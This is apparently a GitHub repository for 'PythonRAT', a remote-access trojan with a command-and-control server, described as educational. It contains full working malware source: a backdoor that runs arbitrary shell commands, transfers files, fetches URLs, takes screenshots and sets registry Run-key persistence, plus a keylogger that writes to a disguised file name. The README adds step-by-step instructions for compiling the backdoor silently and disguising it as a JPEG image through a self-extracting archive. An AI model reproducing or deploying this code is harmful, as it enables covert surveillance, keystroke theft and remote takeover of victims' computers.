README.md
# PythonRAT

PythonRAT is a Command and Control (C2) server which can control multiple machines running the Remote Administration Trojan (RAT) forming a botnet cluster which was written in Python3. 

PythonRAT was developed for **educational** purposes and continues to be developed as such!

<p align="center">
  <img width="367" alt="PythonRAT Banner" src="https://user-images.githubusercontent.com/10171446/178044012-1ad8b92b-024e-4902-9492-7f7b6b1e0761.png">
</p>


# Features

- Integrated keylogger written as a class
  - Can be started and stopped remotely
  - With options to _dump_ or _overwrite_ the log file
- Check privilege level (Administrator/User)
- Spawn other programs
- Download files from target
- Download files from specified URL
- Upload files to target
- C2 allows control of multiple target sessions
- Issue a _sendall *command*_ to every active session
- Persistence by creating a registry entry (Windows)
- Conceals infection by writing files in AppData (Windows)

- Screenshot of the target's screen which is sent to server
- Remote shutdown of the backdoor _(executable is NOT safely removed)_


# Table of Contents  
- [Usage Manuals](#usage-manuals)
  - [C2 Manual](#c2-manual)
  - [Session Manual](#session-manual)
- [Dependencies](#dependencies)
- [Wine and Pyinstaller (Win version) Installation on Linux](#wine-and-pyinstaller-win-version-installation-on-linux)
  - [Environment Setup](#environment-setup)
  - [Installing Dependencies](#installing-dependencies)
- [Backdoor Compilation and Obfuscation for Windows](#backdoor-compilation-and-obfuscation-for-windows)
  - [Compile to Executable using Pyinstaller Linux](#compile-to-executable-using-pyinstaller-linux)
  - [Compile to Executable using Pyinstaller (Win) under Wine](#compile-to-executable-using-pyinstaller-win-under-wine)
  - [Obfuscation using SFX Archive (Theory)](#obfuscation-using-sfx-archive-theory)
  - [Creating SFX Archive](#creating-sfx-archive)
  - [Creating SFX Archive - Visual](#creating-sfx-archive---visual)
  - [Task Manager](#task-manager)
- [Preview Images](#preview-images)
  - [Target Connection to C2 Server](#target-connection-to-c2-server)
  - [Interacting with Session](#interacting-with-session)
  - [Test Commands on Target](#test-commands-on-target)
  - [Session Options](#session-options)
  - [Backgrounding and Killing Session](#backgrounding-and-killing-session)

# Usage Manuals
## C2 Manual

    targets                 --> Prints Active Sessions
    session *session num*   --> Will Connect To Session (background to return)
    clear                   --> Clear Terminal Screen
    exit                    --> Quit ALL Active Sessions and Closes C2 Server!!
    kill *session num*      --> Issue 'quit' To Specified Target Session
    sendall *command*       --> Sends The *command* To ALL Active Sessions (sendall notepad)



## Session Manual

    quit                                --> Quit Session With The Target
    clear                               --> Clear The Screen
    background                          --> Send Session With Target To Background
    cd *Directory name*                 --> Changes Directory On Target System
    upload *file name*                  --> Upload File To The Target Machine From Working Dir 
    download *file name*                --> Download File From Target Machine
    get *url*                           --> Download File From Specified URL to Target ./
    keylog_start                        --> Start The Keylogger
    keylog_dump                         --> Print Keystrokes That The Target From taskmanager.txt
    keylog_stop                         --> Stop And Self Destruct Keylogger File
    screenshot                          --> Takes screenshot and sends to server ./screenshots/
    start *programName*                 --> Spawn Program Using backdoor e.g. 'start notepad'
    remove_backdoor                     --> Removes backdoor from target!!!
    
    ===Windows Only===
    persistence *RegName* *filename*    --> Create Persistence In Registry
                                            copies backdoor to ~/AppData/Roaming/filename
                                            example: persistence Backdoor windows32.exe
    check                               --> Check If Has Administrator Privileges

# Dependencies

The C2 server has no _external dependencies_ as of _v0.9.2-alpha_.

The backdoor relies on:

    pip install pyautogui \
                requests

 - **PyAutoGUI** is required for the `screenshot()` function.
 - **Requests** is required for the `download_url()` function.


# Wine and Pyinstaller (Win version) Installation on Linux

Python 2.7.14 Releases: https://www.python.org/downloads/release/python-2714/

## Environment Setup

┌──(root💀kali)-[~/]

└─# 

    sudo su
    dpkg --add-architecture i386
    apt update
    apt install wine32 
    wget https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi
    sudo wine msiexec -i ~/python-2.7.14.msi #x86 arch
    
    
## Installing Dependencies

┌──(root💀kali)-[~]

└─# 

    cd /root/.wine/drive_c/Python27
    wine python.exe -m pip install  pyinstaller \
                                    requests \ 
                                    pyautogui \
				                    pynput


# Backdoor Compilation and Obfuscation for Windows

## Compile to Executable using Pyinstaller Linux

    $ pyinstaller --onefile --noconsole backdoor.py

or,

## Compile to Executable using Pyinstaller (Win) under Wine

┌──(root💀kali)-[~]

└─#

	wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole ~/backdoor.py
    
**alternatively** if an _icon_ has already been created,
    
	wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --icon ~/malware_128x128.ico ~/backdoor.py
    
This will produce _./dist/backdoor.exe_


## Obfuscation using SFX Archive (Theory)

The executable _backdoor.exe_ will be made to look like an image (jpg) file.
By default, Windows does not show file extensions (e.g. backdoor.exe will show in Windows Explorer as backdoor).
Hence, we will create an SFX archive name _wallpaper.jpg.exe_ which Windows Explorer will show as _wallpaper.jpg_.

This will involve having an _image_ which we will also create an icon version of _.ico_ to assign the SFX archive.
Making the executable appear to be an image.

Of course, this same method could be applied to audio, document or video file using an appropriate icon.

### NOTE: SFX Archive

SFX archive is not the only method of obfuscating the executable.
We can when compiling using _Pyinstaller_ add the argument _--add-data "/root/wallpaper.jpg;."_ with
_--icon ~/wallpaper.ico_.

┌──(root💀kali)-[~]

└─#

    wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --add-data "/root/wallpaper.jpg;." --icon ~/malware_128x128.ico ~/backdoor.py
    mv ./dist/_backdoor.exe_ ./dist/_wallpaper.jpg.exe_


## Creating SFX Archive

WinRAR > Add To Archive (image.jpg and backdoor.exe)

Rename archive to: _image.jpg.exe_


-Add to SFX Archive (Y) and Advanced>

    **Setup>Run after extraction**
    
		California-HD-Background.jpg
		backdoor.exe

	**Modes**
		Unpack to temporary folder
		Silent mode
			Hide all

	**Update**
		Update mode>
			Extract and update files
		Overwrite mode>
			Overwrite all files
			
	**Text and icon**
		Load SFX icon from the file (image ICO)



## Creating SFX Archive - Visual

https://user-images.githubusercontent.com/10171446/153578069-851d3896-67d0-465b-ad92-267ad21504ee.mp4


This will produce an SFX archive which looks like an image

While inspecting the file will reveal it is an executable the file extension _.exe_ is concealed.
Furthermore, if viewed from the Desktop the file cannot be differentiated from a 'real' image.

![image8](https://user-images.githubusercontent.com/10171446/153618884-601e9a7f-9bda-4fd5-a5a0-9808053160c5.PNG)



Once opened the SFX archive will open the image file inside the archive and the malware will execute after.

Due to _--noconsole_ argument in _Pyinstaller_, no window will be rendered.


## Task Manager

The _backdoor.exe_ process can be seen in Task Manager and ended there if necessary.

# Preview Images

## Target Connection to C2 Server

![Screenshot_2022-02-10_06-16-22](https://user-images.githubusercontent.com/10171446/153403206-4ce3dc23-4c1a-41b6-a715-2e2021d965ce.png)


## Interacting with Session

![Screenshot_2022-02-10_06-17-20](https://user-images.githubusercontent.com/10171446/153403283-3df77fd8-2cbe-4990-b82f-d847bdde3bee.png)


## Test Commands on Target

![Screenshot_2022-02-10_06-22-48](https://user-images.githubusercontent.com/10171446/153403427-058ebe8a-36d8-465c-8386-7a55cea1641b.png)


## Session Options

![Screenshot_2022-02-10_06-23-21](https://user-images.githubusercontent.com/10171446/153403579-3b090b00-2dec-4c33-a94d-020eb2b0d2b4.png)


## Backgrounding and Killing Session

![Screenshot_2022-02-10_06-25-04](https://user-images.githubusercontent.com/10171446/153403973-d9757c68-4ca2-405f-ae13-a0ca0666bfcc.png)



CHANGELOG
Changelog for PythonRAT
-------------------

1.0.0   (2022-07-08)
  * Programmed Colour class
  * Termcolor dependency no longer necessary
  * Implemented a banner on launch of c2.py


c2.py
import socket
import json
import os
import threading

# Local class imports
from colour import banner, Colour


def reliable_recv(target):
    data = ''
    while True:
        try:
            data = data + target.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue


def reliable_send(target, data):
    jsondata = json.dumps(data)
    target.send(jsondata.encode())


# This function is to stop server.py issuing reliable_send if command='help' or 'clear'
# Creates less network traffic.
def exclusion_words(command):
    exclusion_words = ['help', 'clear']  # make this global variable
    if command == exclusion_words:
        return 1


def upload_file(target, file_name):
    f = open(file_name, 'rb')
    target.send(f.read())


def download_file(target, file_name):
    f = open(file_name, 'wb')
    target.settimeout(2)
    chunk = target.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = target.recv(1024)
        except socket.timeout as e:
            break
    target.settimeout(None)
    f.close()


def screenshot(target, count):
    directory = './screenshots'
    if not os.path.exists(directory):
        os.makedirs(directory)
    f = open(directory + '/screenshot_%d.png' % (count), 'wb')  # if target=Linux then #apt-get install scrot
    target.settimeout(3)
    chunk = target.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = target.recv(1024)
        except socket.timeout as e:
            break
    target.settimeout(None)
    f.close()
    count += 1


# TODO: webcam(target) takes a quick webcam image
# https://stackoverflow.com/a/69282582/4443012

# TODO: encrypt()
# TODO: decrypt() functions using RSA library AES128-GCM

# TODO: use Flask to create a frontend UI in the web browser to manage C2 https://github.com/Tomiwa-Ot/moukthar


def server_help_manual():
    print('''\n
    quit                                --> Quit Session With The Target
    clear                               --> Clear The Screen
    background                          --> Send Session With Target To Background
    cd *Directory name*                 --> Changes Directory On Target System
    upload *file name*                  --> Upload File To The Target Machine From Working Dir 
    download *file name*                --> Download File From Target Machine
    get *url*                           --> Download File From Specified URL to Target ./
    keylog_start                        --> Start The Keylogger
    keylog_dump                         --> Print Keystrokes That The Target From taskmanager.txt
    keylog_stop                         --> Stop And Self Destruct Keylogger File
    screenshot                          --> Takes screenshot and sends to server ./screenshots/
    start *programName*                 --> Spawn Program Using backdoor e.g. 'start notepad'
    remove_backdoor                     --> Removes backdoor from target!!!
    
    ===Windows Only===
    persistence *RegName* *filename*    --> Create Persistence In Registry
                                            copies backdoor to ~/AppData/Roaming/filename
                                            example: persistence Backdoor windows32.exe
    check                               --> Check If Has Administrator Privileges


    \n''')


def c2_help_manual():
    print('''\n
    ===Command and Control (C2) Manual===

    targets                 --> Prints Active Sessions
    session *session num*   --> Will Connect To Session (background to return)
    clear                   --> Clear Terminal Screen
    exit                    --> Quit ALL Active Sessions and Closes C2 Server!!
    kill *session num*      --> Issue 'quit' To Specified Target Session
    sendall *command*       --> Sends The *command* To ALL Active Sessions (sendall notepad)
    \n''')


def target_communication(target, ip):
    count = 0
    while True:
        command = input('* Shell~%s: ' % str(ip))
        reliable_send(target, command)
        if command == 'quit':
            break
        elif command == 'background':
            break
        elif command == 'clear':
            os.system('clear')
        elif command[:3] == 'cd ':
            pass
        elif command[:6] == 'upload':
            upload_file(target, command[7:])
        elif command[:8] == 'download':
            download_file(target, command[9:])
        elif command[:10] == 'screenshot':
            screenshot(target, count)
        elif command == 'help':
            server_help_manual()
        else:
            result = reliable_recv(target)
            print(result)


def accept_connections():
    while True:
        if stop_flag:
            break
        sock.settimeout(1)
        try:
            target, ip = sock.accept()
            targets.append(target)
            ips.append(ip)
            # print(termcolor.colored(str(ip) + ' has connected!', 'green'))
            print(Colour().green(str(ip) + " has connected!"))
            print('[**] Command & Control Center: ', end="")
        except:
            pass


# Work in progress (currently 'exit' command is buggy when issued from c2()
def c2():
    while True:
        try:
            command = input('[**] Command & Control Center: ')
            if command == 'targets':
                counter = 0
                for ip in ips:
                    print('Session ' + str(counter) + ' --- ' + str(ip))
                    counter += 1
            elif command == 'clear':
                os.system('clear')
            elif command[:7] == 'session':
                try:
                    num = int(command[8:])
                    tarnum = targets[num]
                    tarip = ips[num]
                    target_communication(tarnum, tarip)
                except:
                    print('[-] No Session Under That ID Number')
            elif command == 'exit':
                for target in targets:
                    reliable_send(target, 'quit')
                    target.close()
                sock.close()
                stop_flag = True
                t1.join()
                break
            elif command[:4] == 'kill':
                targ = targets[int(command[5:])]
                ip = ips[int(command[5:])]
                reliable_send(targ, 'quit')
                targ.close()
                targets.remove(targ)
                ips.remove(ip)
            elif command[:7] == 'sendall':
                x = len(targets)
                print(x)
                i = 0
                try:
                    while i < x:
                        tarnumber = targets[i]
                        print(tarnumber)
                        reliable_send(tarnumber, command)
                        i += 1
                except:
                    print('Failed')
            elif command[:4] == 'help':
                c2_help_manual()
            else:
                # print(termcolor.colored('[!!] Command Doesnt Exist', 'red'))
                print(Colour().red('[!!] Command Doesnt Exist'))
        except (KeyboardInterrupt, SystemExit):
            if input('\nDo you want to exit? yes/no: ') == 'yes':
                break
        except ValueError as e:
            print('[!!] ValueError: ' + str(e))
            continue
        finally:
            sock.close()
            print('\n[-] C2 Socket Closed! Bye!!')


def exit_c2(targets):  # function of: elif command == 'exit':
    for target in targets:
        reliable_send(target, 'quit')
        target.close()
    sock.close()
    stop_flag = True
    t1.join()
    SystemExit()


targets = []
ips = []
stop_flag = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 5555))  # sudo fuser -k 5555/tcp
sock.listen(5)
t1 = threading.Thread(target=accept_connections)
t1.start()
print(banner())
print('Run "help" command to see the usage manual')
print(Colour().green('[+] Waiting For The Incoming Connections ...'))

# c2()

# Command and control code (legacy)
while True:
    try:
        command = input('[**] Command & Control Center: ')
        if command == 'targets':
            counter = 0
            for ip in ips:
                print('Session ' + str(counter) + ' --- ' + str(ip))
                counter += 1
        elif command == 'clear':
            os.system('clear')
        elif command[:7] == 'session':
            try:
                num = int(command[8:])
                tarnum = targets[num]
                tarip = ips[num]
                target_communication(tarnum, tarip)
            except:
                print('[-] No Session Under That ID Number')
        elif command == 'exit':
            for target in targets:
                reliable_send(target, 'quit')
                target.close()
            sock.close()
            stop_flag = True
            t1.join()
            break
        elif command[:4] == 'kill':
            targ = targets[int(command[5:])]
            ip = ips[int(command[5:])]
            reliable_send(targ, 'quit')
            targ.close()
            targets.remove(targ)
            ips.remove(ip)
        elif command[:7] == 'sendall':
            x = len(targets)
            print(x)
            i = 0
            try:
                while i < x:
                    tarnumber = targets[i]
                    print(tarnumber)
                    reliable_send(tarnumber, command)
                    i += 1
            except:
                print('Failed')
        elif command[:4] == 'help':
            c2_help_manual()
        else:
            print(Colour().red('[!!] Command Doesnt Exist'))
    except (KeyboardInterrupt, SystemExit):
        if input('\nDo you want to exit? yes/no: ') == 'yes':
            sock.close()
            print(Colour().yellow('\n[-] C2 Socket Closed! Bye!!'))
            break
    except ValueError as e:
        print(Colour().red('[!!] ValueError: ' + str(e)))
        continue

# TODO: encrypt connection
# TODO: Implement a 'pulse' feature between server and backdoor (Keep alive)
# This will ensure if server.py crashes the backdoor will after 60s will realise server is not listen on socket
# and will attempt to run connection() function again.


colour.py
def banner():
    return (Colour.green("""                                   
,------.          ,------.   ,---. ,--------. 
|  .--. ',--. ,--.|  .--. ' /  O  \'--.  .--' 
|  '--' | \  '  / |  '--'.'|  .-.  |  |  |    
|  | --'   \   '  |  |\  \ |  | |  |  |  |    
`--'     .-'  /   `--' '--'`--' `--'  `--'    
         `---'                                
    """) + "(" +
            Colour.blue("v1.0.0") + ")" +
            Colour.yellow(" Author: safesploit") +
            "\n")


class Colour():
    @staticmethod
    def red(str):
        return "\033[91m" + str + "\033[0m"

    @staticmethod
    def green(str):
        return "\033[92m" + str + "\033[0m"

    @staticmethod
    def yellow(str):
        return "\033[93m" + str + "\033[0m"

    @staticmethod
    def blue(str):
        return "\033[94m" + str + "\033[0m"

# print(banner())


backdoor/keylogger.py
#Possibly requires Python3.7
import os
from pynput.keyboard import Listener #Dependency # pip install listener
import time
import threading
from sys import platform

class Keylogger():
    keys = []
    count = 0
    flag = 0
    if platform == 'win32':
        path = os.environ['appdata'] +'\\processmanager.txt' 
        #Windows path #cmd.exe> type AppData\Roaming\processmanager.txt 
        #(Windows also supports >more command)
    elif platform == "linux" or platform == "linux2" or platform == "darwin": 
        path = 'processmanager.txt'

    def on_press(self, key):
        self.keys.append(key)
        self.count += 1

        if self.count >= 1:
            self.count = 0
            self.write_file(self.keys)
            self.keys = []

    def read_logs(self):
        with open(self.path, 'rt') as f:
            return f.read()

    def write_file(self, keys):
        with open(self.path, 'a') as f:
            for key in keys:
                k = str(key).replace("'", "")
                if k.find('backspace') > 0:
                    f.write(' [BACKSPACE] ')
                elif k.find('enter') > 0:
                    f.write('\n')
                # elif k.find('control') > 0:   #doesn't currently work
                #     f.write(' [CTRL] ')
                elif k.find('shift') > 0:
                    f.write(' [SHIFT] ')
                elif k.find('space') > 0:
                    f.write(' ')
                elif k.find('caps_lock') > 0:
                    f.write(' [CAPS_LOCK] ')
                elif k.find('Key'):
                    f.write(k)

    def self_destruct(self):
        self.flag = 1
        listener.stop()
        #self.overwrite_file(self.path)
        os.remove(self.path)

    def overwrite_file(self):
        print('keylog file path: ' + self.path) #to test this is calling correctly
        with open(self.path, 'w') as f:
            f.write('\n')
        #This section should overwrite the keylog file

    def start(self):
        global listener
        with Listener(on_press=self.on_press) as listener:
            listener.join()

if __name__ == '__main__':
    keylog = Keylogger()
    t = threading.Thread(target=keylog.start)
    t.start()
    while keylog.flag != 1:
        time.sleep(10)
        logs = keylog.read_logs()
        print(logs)
        #keylog.self_destruct()
    t.join()


backdoor/backdoor.py
import socket
import json
import subprocess
import time
import os
import pyautogui    #dependency # pip install pyautogui #mss is faster alternative
import keylogger
import threading
import shutil
import sys
import requests
from sys import platform

def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())

def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue

def download_file(file_name):
    f = open(file_name, 'wb')
    s.settimeout(2)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()

def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())

def download_url(url):
    get_response = requests.get(url)
    file_name = url.split('/')[-1]
    with open(file_name, 'wb') as out_file:
        out_file.write(get_response.content)

def screenshot():
    myScreenshot = pyautogui.screenshot()
    myScreenshot.save('.screen.png')

def persist(reg_name, copy_name):
    file_location = os.environ['appdata'] + '\\' + copy_name
    try:
        if not os.path.exists(file_location):
            shutil.copyfile(sys.executable, file_location)
            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
            reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
        else:
            reliable_send('[+] Persistence Already Exists')
    except:
        reliable_send('[-] Error Creating Persistence With The Target Machine')

def is_admin():
    global admin
    if platform == 'win32':
        try:
            temp = os.listdir(os.sep.join([os.environ.get('SystemRoot', 'C:\windows'), 'temp']))
        except:
            admin = '[!!] User Privileges!'
        else:
            admin = '[+] Administrator Privileges!'
    elif platform == "linux" or platform == "linux2" or platform == "darwin": 
        pass
        #TO BE DONE

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':   #BEGIN
            pass
        elif command == 'help':         #ideally to be removed
            pass
        elif command == 'clear':
            pass                        #END
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:3] == 'get': 
            try:
                download_url(command[4:])
                reliable_send('[+] Downloaded File From Specified URL!')
            except:
                reliable_send('[!!] Download Failed!')
        elif command[:10] == 'screenshot':
            screenshot()
            upload_file('.screen.png')
            os.remove('.screen.png')
        elif command[:12] == 'keylog_start':
            keylog = keylogger.Keylogger()
            t = threading.Thread(target=keylog.start)
            t.start()
            reliable_send('[+] Keylogger Started!')
        elif command[:11] == 'keylog_dump':
            logs = keylog.read_logs()
            reliable_send(logs)
        elif command[:11] == 'keylog_stop':
            keylog.self_destruct()
            t.join()
            reliable_send('[+] Keylogger Stopped!')
        elif command[:11] == 'persistence':
            reg_name, copy_name = command[12:].split(' ')
            persist(reg_name, copy_name)
        elif command[:7] == 'sendall':
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        elif command[:5] == 'check':
            try:
                is_admin()
                reliable_send(admin + ' platform: ' + platform)
            except:
                reliable_send('Cannot Perform Privilege Check! Platform: ' + platform)
        elif command[:5] == 'start':
            try:
                subprocess.Popen(command[6:], shell=True)
                reliable_send('[+] Started!')
            except:
                reliable_send('[-] Failed to start!')
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)

def connection():
    while True:
        time.sleep(5)
        try:
            s.connect(('127.0.0.1', 5555))
            # if platform == 'win32':       #TO BE DONE
            #     persist('Backdoor', 'windows32.exe')
            shell()
            s.close()
            break
        except:
            connection()
            
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()